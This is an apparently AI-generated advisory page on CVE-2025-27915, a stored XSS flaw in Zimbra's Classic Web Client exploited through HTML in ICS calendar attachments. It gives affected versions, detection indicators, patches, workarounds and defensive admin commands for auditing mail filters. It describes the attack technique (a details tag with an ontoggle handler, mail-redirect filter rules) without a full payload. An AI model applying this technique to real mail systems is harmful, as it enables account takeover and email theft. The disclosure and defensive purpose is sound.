CVE-2025-27915 Overview
A stored cross-site scripting (XSS) vulnerability has been discovered in Zimbra Collaboration Suite (ZCS) versions 9.0, 10.0, and 10.1. The vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS (iCalendar) files. When a user views an email message containing a malicious ICS entry, embedded JavaScript executes via an ontoggle event inside a <details> HTML tag.
This vulnerability is particularly dangerous because it allows attackers to execute arbitrary JavaScript within the context of a victim's authenticated session, enabling unauthorized actions such as creating email filter rules to redirect messages to attacker-controlled addresses.
Critical Impact
This vulnerability is actively exploited in the wild and has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog. Attackers can perform unauthorized actions on victim accounts, including email redirection and data exfiltration.
Affected Products
- Zimbra Collaboration Suite 9.0.0 (all patch levels through P43)
- Zimbra Collaboration Suite 10.0 (versions prior to 10.0.13)
- Zimbra Collaboration Suite 10.1 (versions prior to 10.1.5)
Discovery Timeline
- 2025-03-12 - CVE-2025-27915 published to NVD
- 2025-11-04 - Last updated in NVD database
Technical Details for CVE-2025-27915
Vulnerability Analysis
This stored XSS vulnerability exploits a weakness in how Zimbra's Classic Web Client processes and renders ICS (iCalendar) calendar file attachments within email messages. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation).
When a user receives and views an email containing a crafted ICS file, the Classic Web Client fails to properly sanitize the HTML content embedded within the calendar entry. The attacker leverages the <details> HTML5 element combined with the ontoggle event handler to trigger JavaScript execution when the element's state changes.
The attack requires user interaction (viewing the malicious email) and targets authenticated users of the Zimbra Classic Web Client. Once executed, the attacker's JavaScript runs within the victim's session context, granting access to perform actions as the authenticated user.
Root Cause
The root cause is insufficient input sanitization in the ICS file parser and renderer within Zimbra's Classic Web Client. The application fails to properly strip or escape HTML5 event handlers and interactive elements such as <details> tags from ICS file content before rendering it in the browser. This allows attacker-controlled HTML and JavaScript to be stored on the server and executed when other users view the malicious content.
Attack Vector
The attack is delivered via email containing a specially crafted ICS calendar file attachment. The attacker embeds malicious HTML within the ICS file structure, specifically using a <details> tag with an ontoggle event handler. When the victim opens or previews the email in Zimbra's Classic Web Client, the browser renders the ICS content without proper sanitization.
The JavaScript payload executes in the context of the victim's authenticated session, allowing the attacker to:
- Create email filter rules to redirect incoming messages to attacker-controlled addresses
- Access and exfiltrate sensitive email content
- Modify account settings
- Send emails on behalf of the victim
- Potentially chain with other vulnerabilities for further compromise
The attack mechanism leverages the <details> tag's interactive nature—when the element is toggled (opened or closed), the ontoggle event fires, executing the embedded JavaScript payload without requiring additional user clicks beyond viewing the email.
Detection Methods for CVE-2025-27915
Indicators of Compromise
- Suspicious email filter rules created without user knowledge, particularly rules forwarding emails to external addresses
- ICS file attachments containing unusual HTML elements such as <details>, <summary>, or event handlers like ontoggle, onclick, or onerror
- Unexpected outbound email traffic to unfamiliar external domains
- User reports of missing emails that match newly created filter criteria
Detection Strategies
- Implement email gateway rules to scan ICS attachments for embedded HTML tags and JavaScript event handlers
- Monitor Zimbra audit logs for bulk filter rule creations or modifications, especially those targeting email forwarding
- Deploy web application firewall (WAF) rules to detect and block XSS patterns in calendar-related requests
- Review mail filter configurations across user accounts for unauthorized forwarding rules
Monitoring Recommendations
- Enable detailed logging for email filter rule changes in Zimbra administrative console
- Set up alerts for filter rules that forward emails to external domains
- Monitor for unusual patterns in ICS file attachments being received organization-wide
- Implement user behavior analytics to detect anomalous account activities following email viewing
How to Mitigate CVE-2025-27915
Immediate Actions Required
- Upgrade Zimbra Collaboration Suite to patched versions: 9.0.0 P44, 10.0.13, or 10.1.5
- Audit all user email filter rules for unauthorized forwarding configurations
- Consider temporarily disabling the Classic Web Client and directing users to the Modern Web Client if immediate patching is not possible
- Review recent ICS file attachments received by the organization for malicious content
Patch Information
Zimbra has released security patches addressing this vulnerability across all affected version branches:
- Zimbra 9.0.0 Patch 44 - See the Zimbra 9.0.0 P44 Security Fixes for details
- Zimbra 10.0.13 - See the Zimbra 10.0.13 Security Fixes for details
- Zimbra 10.1.5 - See the Zimbra 10.1.5 Security Fixes for details
Organizations should prioritize patching immediately given this vulnerability's presence in the CISA Known Exploited Vulnerabilities Catalog. Additional technical analysis is available from StrikeReady's research on this ICS attack vector.
Workarounds
- Block or quarantine emails containing ICS file attachments at the email gateway until patching is complete
- Disable the Classic Web Client and enforce use of the Modern Web Client, which may have different rendering behavior
- Implement Content Security Policy (CSP) headers to restrict inline script execution where possible
- Deploy email security solutions that can inspect and sanitize calendar file attachments
# Example: Check Zimbra version and patch level
su - zimbra
zmcontrol -v
# Example: Review existing mail filter rules for all users (run as zimbra user)
zmprov -l gaa | while read account; do
echo "=== Filters for: $account ==="
zmprov ga "$account" zimbraMailSieveScript
done
# Example: Search for suspicious filter forwarding rules
zmprov -l gaa | while read account; do
zmprov ga "$account" zimbraMailSieveScript 2>/dev/null | grep -i "redirect\|forward"
done
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
